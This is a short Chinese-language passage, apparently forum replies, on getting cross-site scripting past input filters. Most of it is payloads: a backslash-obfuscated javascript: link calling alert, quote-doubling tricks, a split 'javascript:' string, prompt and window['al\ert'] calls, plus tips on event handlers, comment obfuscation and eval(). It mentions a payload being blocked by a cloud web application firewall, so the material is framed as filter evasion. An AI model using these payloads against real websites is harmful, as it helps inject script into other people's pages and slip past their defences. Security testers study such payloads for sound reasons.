使用:实体化:进行替换(自行去掉斜杠)
<a href=javas\cript\:ale\rt(2)>1</a>
herf后面放超链接啊。带冒号是http://这个吧,不加也可以啊
你指的过滤是被删除还是转义了;
删除的话可以考虑双写引号试试:'"payload"',
还可以考虑不带引号的payload,已发就被云盾拦截了,payload:
j| a| v| a s c r i p t :
prompt| ( 123 ) //
window['al\ert'](1);
1.利用HTML中的事件触发XSS;
2.通过/**/,混淆过滤:
3.通过eval()函数执行js;
